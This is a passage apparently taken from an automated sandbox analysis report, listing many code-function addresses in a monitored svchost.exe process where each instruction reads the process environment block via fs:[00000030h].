                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]1_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]1_2_031F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]1_2_03160124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]1_2_0312C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]1_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]1_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]1_2_03170185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]1_2_032061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]1_2_031601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]1_2_031B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]1_2_031C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]1_2_0312A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]1_2_0312C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]1_2_03132050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]1_2_031B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]1_2_0315C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]1_2_0313208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]1_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]1_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]1_2_031280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]1_2_031C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]1_2_031B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]1_2_0312C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]1_2_031720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0312A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]1_2_031380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]1_2_031B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]1_2_03130710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]1_2_03160710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]1_2_0316C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]1_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]1_2_031AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]1_2_03130750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]1_2_031BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]1_2_031B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]1_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]1_2_03138770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]1_2_031D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]1_2_031307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]1_2_031E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]1_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]1_2_031B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]1_2_031BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]1_2_03172619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]1_2_031AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]1_2_0314E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]1_2_03166620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]1_2_03168620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]1_2_0313262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]1_2_0314C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]1_2_03162674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]1_2_031666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]1_2_0316C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h] | 1_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h] | 1_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h] | 1_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h] | 1_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h] | 1_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h] | 1_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h] | 1_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h] | 1_2_031C6500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h] | 1_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h] | 1_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h] | 1_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h] | 1_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h] | 1_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h] | 1_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h] | 1_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h] | 1_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h] | 1_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h] | 1_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h] | 1_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h] | 1_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h] | 1_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h] | 1_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h] | 1_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h] | 1_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h] | 1_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h] | 1_2_0316E59C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03132582 mov eax, dword ptr fs:[00000030h] | 1_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h] | 1_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03164588 mov eax, dword ptr fs:[00000030h] | 1_2_03164588
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h] | 1_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h] | 1_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h] | 1_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h] | 1_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h] | 1_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h] | 1_2_031365D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h] | 1_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h] | 1_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h] | 1_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h] | 1_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h] | 1_2_031325E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h] | 1_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h] | 1_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h] | 1_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h] | 1_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h] | 1_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h] | 1_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h] | 1_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h] | 1_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h] | 1_2_0312C427
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h] | 1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h] | 1_2_031EA456
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312645D mov eax, dword ptr fs:[00000030h] | 1_2_0312645D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315245A mov eax, dword ptr fs:[00000030h] | 1_2_0315245A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
